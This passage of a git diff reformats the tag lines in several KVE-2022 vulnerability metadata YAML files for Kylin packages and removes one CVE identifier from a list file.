+++ b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0206 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml index 509a3d1ff549bdb6d59c1486ce3454325381790f..d52ead9b557306b198bfd493a4412a773e9bb0dd 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0207 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml index df9264e57bd687c2284269c08b64bb027bad2f32..bbcd86e9ff325d91ff0a1d5d21001f9107f7d17c 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0210 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml index 0e9b92df4c8cf3fd4601127de93a1bb1375e2579..bf1585c3b7388fc81744a82e0d0616fef0e61a02 100644 --- a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml +++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0205 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index ea9254993a1143b2ef3a3f4c841b1f2516f4128b..819961a3d1a6ab7f04cc6d71437ace2097568d57 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -8,7 +8,6 @@ cve: - CVE-2021-42327 - CVE-2022-0995 - CVE-2022-1015 - - CVE-2022-2602 - CVE-2022-2586 - CVE-2021-33624 - CVE-2020-27194